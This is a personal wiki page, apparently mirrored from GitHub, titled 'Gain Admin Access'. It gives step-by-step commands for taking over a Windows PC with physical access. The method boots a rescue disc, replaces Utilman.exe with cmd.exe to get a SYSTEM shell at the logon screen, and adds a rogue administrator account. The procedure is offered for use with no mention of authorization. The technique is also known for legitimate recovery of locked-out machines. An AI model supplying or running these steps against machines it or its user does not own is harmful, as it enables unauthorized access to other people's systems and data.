mirror of
https://github.com/mbirth/wiki.git
synced 2024-11-14 14:06:46 +00:00
52 lines
2.5 KiB
Markdown
52 lines
2.5 KiB
Markdown
---
|
|
title: Gain Admin Access
|
|
layout: default
|
|
created: 2010-01-28 19:40:15 +0100
|
|
updated: 2010-01-28 20:24:21 +0100
|
|
toc: false
|
|
tags:
|
|
- know-how
|
|
- software
|
|
- windows
|
|
- hacking
|
|
---
|
|
To get access to a Windows PC as an *Administrator* user, there is a very brute security hole which you can use. The
|
|
only thing is: You need physical access to the machine.
|
|
|
|
The procedure is as follows:
|
|
|
|
1. use a Linux Boot-CD (e.g. [BackTrack 4](http://www.backtrack-linux.org/) or the [System Rescue CD](http://www.sysresccd.org/Download))
|
|
or a Windows Installation disc (of the same version as installed!)
|
|
* **Linux Boot-CD:** (there's also a nice screencast over at [offensive-security.com](http://www.offensive-security.com/videos/owning-windows-vista-video/hacking-vista-with-backtrack.html))
|
|
1. if not already, mount the Windows partition
|
|
1. go to `Windows/system32/`
|
|
1. rename the file `Utilman.exe` to `Utilman.exe.bak` and copy `cmd.exe` to `Utilman.exe`:
|
|
|
|
# mv Utilman.exe Utilman.exe.bak
|
|
# cp cmd.exe Utilman.exe
|
|
|
|
1. reboot the machine into Windows
|
|
* **Windows Boot-CD:**
|
|
1. select your Windows version to "repair"
|
|
1. if it asks whether you want to do use *System Rescue*, say "No"
|
|
1. after it has given up trying to repair your system, click the small link *Advanced Recovery Options*
|
|
1. select *Command Prompt*
|
|
1. now go to your Windows drive, for me it was `D:`
|
|
1. do a `cd \Windows\system32`
|
|
1. now rename the file `Utilman.exe` to `Utilman.exe.bak` and copy `cmd.exe` to `Utilman.exe`:
|
|
|
|
D:\>ren Utilman.exe Utilman.exe.bak
|
|
D:\>copy cmd.exe Utilman.exe
|
|
|
|
1. reboot the machine into the regular Windows
|
|
1. on the Logon screen of Windows, press <kbd>Win</kbd>+<kbd>U</kbd> - this would normally open the [Utility Manager](http://www.microsoft.com/enable/training/windowsxp/openutilitymanager.aspx)
|
|
aka. `Utilman.exe`, but now, the *Command Prompt* should show up
|
|
1. you have `SYSTEM` rights, so you can easily add a new Administrator user:
|
|
|
|
C:\>net user BadGuy GoodPassword /add
|
|
C:\>net localgroup Administrators BadGuy /add
|
|
|
|
This will add the user `BadGuy` with the password `GoodPassword` and make him a member of the *Administrators* group.
|
|
1. Login with the newly created user `BadGuy`
|
|
1. Remember to delete the fake `Utilman.exe` and rename `Utilman.exe.bak` back to `Utilman.exe`
|